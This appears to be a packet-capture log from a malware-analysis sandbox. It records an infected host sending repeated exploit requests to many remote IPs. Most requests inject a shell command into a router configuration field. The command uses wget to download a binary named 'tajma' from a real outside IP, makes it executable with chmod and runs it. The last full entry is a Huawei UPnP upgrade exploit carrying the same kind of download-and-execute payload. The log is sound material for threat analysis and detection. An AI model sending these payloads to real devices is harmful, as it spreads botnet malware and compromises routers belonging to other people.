                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2190192.168.2.234820646.158.221.88080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.436288118 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2191192.168.2.2345230100.213.55.408080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.436309099 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2192192.168.2.2357422140.3.96.178080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.436333895 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2193192.168.2.2347780100.168.57.888080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.436362028 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2194192.168.2.235954066.58.110.1318080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.436383009 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2195192.168.2.2339218180.168.15.598080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.436399937 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2196192.168.2.233566058.40.43.1998080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.436866045 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2197192.168.2.2346168193.16.129.2218080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.436882973 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2198192.168.2.2332986217.79.30.1118080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.436912060 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2199192.168.2.2334506133.16.9.728080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.437043905 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2200192.168.2.235553066.123.80.2408080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.437052011 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2201192.168.2.235831462.121.126.2258080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.437079906 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2202192.168.2.2354984172.168.155.2328080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.437107086 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2203192.168.2.2346382102.128.68.928080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.442007065 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2204192.168.2.2355692117.133.224.758080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.442127943 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2205192.168.2.2352022136.8.97.478080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.442128897 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2206192.168.2.2360206131.199.152.2018080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.442662001 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2207192.168.2.2347568104.246.10.2448080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.442713022 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2208192.168.2.2340362159.161.255.658080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.442742109 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2209192.168.2.2342942165.188.33.538080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.442938089 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2210192.168.2.236033641.66.102.19037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.563486099 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2211192.168.2.2354480197.161.67.2337215
                                                        TimestampBytes transferredDirectionData
